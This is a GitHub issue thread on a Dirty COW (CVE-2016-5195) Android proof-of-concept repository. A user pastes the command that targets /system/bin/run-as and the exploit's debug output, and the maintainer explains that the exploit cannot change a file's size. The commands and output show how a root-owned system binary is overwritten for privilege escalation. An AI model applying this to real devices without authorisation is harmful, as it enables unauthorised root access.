search

timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
959 stars 395 forks source link

Exploit does not overwrite destination file #59

Closed DrSchottky closed 7 years ago

DrSchottky commented 7 years ago

Tested on SM-G389F (Android 6.0.1, Kernel 3.10.9). Even if test.sh says that's vulnerable it doesn't not overwrite /system/bin/run-as shell@xcover3velte:/data/local/tmp $ ./dirtycow run-as /system/bin/run-as dcow run-as /system/bin/run-as warning: new file size (5544) and destination file size (17920) differ

shell@xcover3velte:/data/local/tmp $ ./dirtycow run-as  /system/bin/run-as
dcow run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17920) differ

[*] size 17920
[*] mmap 0xb6d4c000
[*] currently 0xb6d4c000=464c457f
[*] using /proc/self/mem method
[*] madvise = 0xb6d4c000 17920
[*] /proc/self/mem 1863680 104
[*] madvise = 0 1658
[*] exploited 0 0xb6d4c000=464c457f
shell@xcover3velte:/data/local/tmp $ ls -l /system/bin/run-as
-rwxr-x--- root     shell       17920 2008-12-31 16:00 run-as
timwr commented 7 years ago

Have you tried running it? It's content may well have changed. The exploit is unable to change the file size of the target, so it's either padded with zeros or truncated.